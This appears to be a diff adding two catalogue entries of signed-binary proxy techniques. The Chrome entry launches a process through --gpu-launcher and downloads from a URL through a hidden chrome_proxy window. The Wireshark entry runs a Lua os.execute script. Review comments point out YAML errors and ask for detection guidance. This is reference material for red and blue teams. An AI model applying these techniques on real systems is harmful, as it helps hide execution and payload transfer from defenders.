36 changes: 36 additions & 0 deletions yml/Desktop_App/GoogleChrome.yml
@@ -0,0 +1,36 @@
---
Name: Google Chrome
Description: Google Chrome is a cross-platform web browser developed by Google.
Author: 'Mirage'
Created: 2023-07-17

Category: Execution
Privileges: User
MitreID: T1204
Usage:
Steps: Execute following command in PowerShell.

& 'C:\Program Files\Google\Chrome\Application\chrome.exe' --silent-launch --disable-gpu-sandbox --gpu-launcher="calc.exe"

& 'C:\Program Files\Google\Chrome\Application\chrome_proxy.exe' --silent-launch --disable-gpu-sandbox --gpu-launcher="calc.exe"

Use case: Chrome spawns calc.exe as a child process of chrome.exe/chrome_proxy.exe and executes the ping command or execute a binary. Executes a process under a non suspicious signed binary.
Resources:
https://github.com/Miragle-Hub/Adversary-tactics-and-techniques-for-Windows/blob/main/Execution/Execution%20of%20binary%20using%20chrome

Category: Download File from internet
Privileges: User
MitreID: T1105 Ingress Tool Transfer
Usage:
Steps: Execute following command in PowerShell.

& 'C:\Program Files\Google\Chrome\Application\chrome_proxy.exe' --profile-directory=Default --incognito --chrome-frame --user-data-dir="C:\Temp\Temp-chrome\" --window-size=0,0 --window-position="0000,1000" <URL>

Use case: The script opens Google Chrome in a minimized window and allows it to download files from the internet without requiring much user intervention. Ensure the creation of a specific directory mentioned in "--user-data-dir" to establish a new profile data.
Resources:
https://medium.com/@mirag3/exploring-alternative-methods-chrome-based-binary-execution-and-file-download-40e9a46ebc59
https://github.com/Miragle-Hub/Adversary-tactics-and-techniques-for-Windows/blob/main/Lateral%20Movement%20/DownloadFileChrome_proxy.exe

Acknowledgement:
- Person: @miragle-hub

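Review bot: this file will not load as valid YAML, because the values under `Steps:` and `Resources:` are written as bare, unindented lines (a line beginning with `& 'C:\...'` is read as an anchor, not a string) and because `Category:`, `Privileges:`, `MitreID:`, `Usage:` and `Resources:` are repeated at the same mapping level, so a loader will either reject the duplicate keys or let the second technique (T1105) silently overwrite the first (T1204). Nest each technique as its own list item and put the multi-line commands in a block scalar (`Steps: |`) or a quoted string, and keep `MitreID` to the bare identifier (`T1105`) as in the first entry rather than `T1105 Ingress Tool Transfer`. The "Use case" text for the first entry also does not match the commands shown: they launch `calc.exe` via `--gpu-launcher`, and nothing in them runs `ping`, so drop that clause. Finally, the entry documents the technique but carries no detection guidance; the facts already on the page (`calc.exe` spawned as a child of `chrome.exe`/`chrome_proxy.exe`, the `--gpu-launcher=` and `--disable-gpu-sandbox` flags on the command line, and a headless `--window-size=0,0` launch with a non-standard `--user-data-dir`) are exactly what a defender would want listed under a `Detection:` key, so please add one.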
34 changes: 34 additions & 0 deletions yml/Desktop_App/wireshark.yml
@@ -0,0 +1,34 @@
---
Name: Wireshark
Description: Wireshark is a free and open-source packet analyzer.
Author: 'Mirage'
Created: 2023-07-17

Category: Execution
Privileges: User
MitreID: T1218
Usage:
Steps: Execute following command in PowerShell.

& 'C:\Program Files\Wireshark\tshark.exe' -X lua_script:'<path of lua script>'
& 'C:\Program Files\Wireshark\wireshark.exe' -X lua_script:'<path of lua script>' (Wireshark also opens while executing)

lua file content
-- mention the binary that needs to be executed
os.execute('C:\\Windows\\notepad.exe')

Use case: Wireshark spawns notepad.exe as a child process of wireshark.exe. Executes a process under a non suspicious signed binary.
Resources:
https://www.youtube.com/watch?v=iMgIp3DVFTA
https://github.com/Miragle-Hub/Adversary-tactics-and-techniques-for-Windows/blob/main/Execution/Wireshark


Acknowledgement:
- Person:
Ali Mosajjal @mosajjal
Diljith Suresh @diljith369
Patrick Dong @superpb9
Mirage @mirage

---
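Review bot: the same YAML validity problem applies here: the two command lines, the note "lua file content", and the Lua snippet (`os.execute(...)`) sit as bare lines under `Steps:`, and the parenthetical "(Wireshark also opens while executing)" is mixed into the second command, so a reader copying the line gets a broken invocation. Move the commands into a block scalar (`Steps: |`), keep the remark about the GUI opening in prose, and give the Lua file its own key or fenced block so it is not confused with a PowerShell line. The `Acknowledgement:` block is also malformed: `- Person:` with no value followed by four unindented names yields a null `Person` and then unparseable text; make it a list with one `- Person:` entry per contributor. The stray `---` on the last line opens an empty second YAML document and should be removed, as should the doubled blank line before `Acknowledgement:`. `MitreID: T1218` here versus `T1204` in `GoogleChrome.yml` for the same "Execution" category is inconsistent; pick one mapping and apply it to both files. As with the Chrome entry, a `Detection:` key is missing even though the page already names what to look for: `notepad.exe` as a child of `wireshark.exe`/`tshark.exe`, and `-X lua_script:` on the command line.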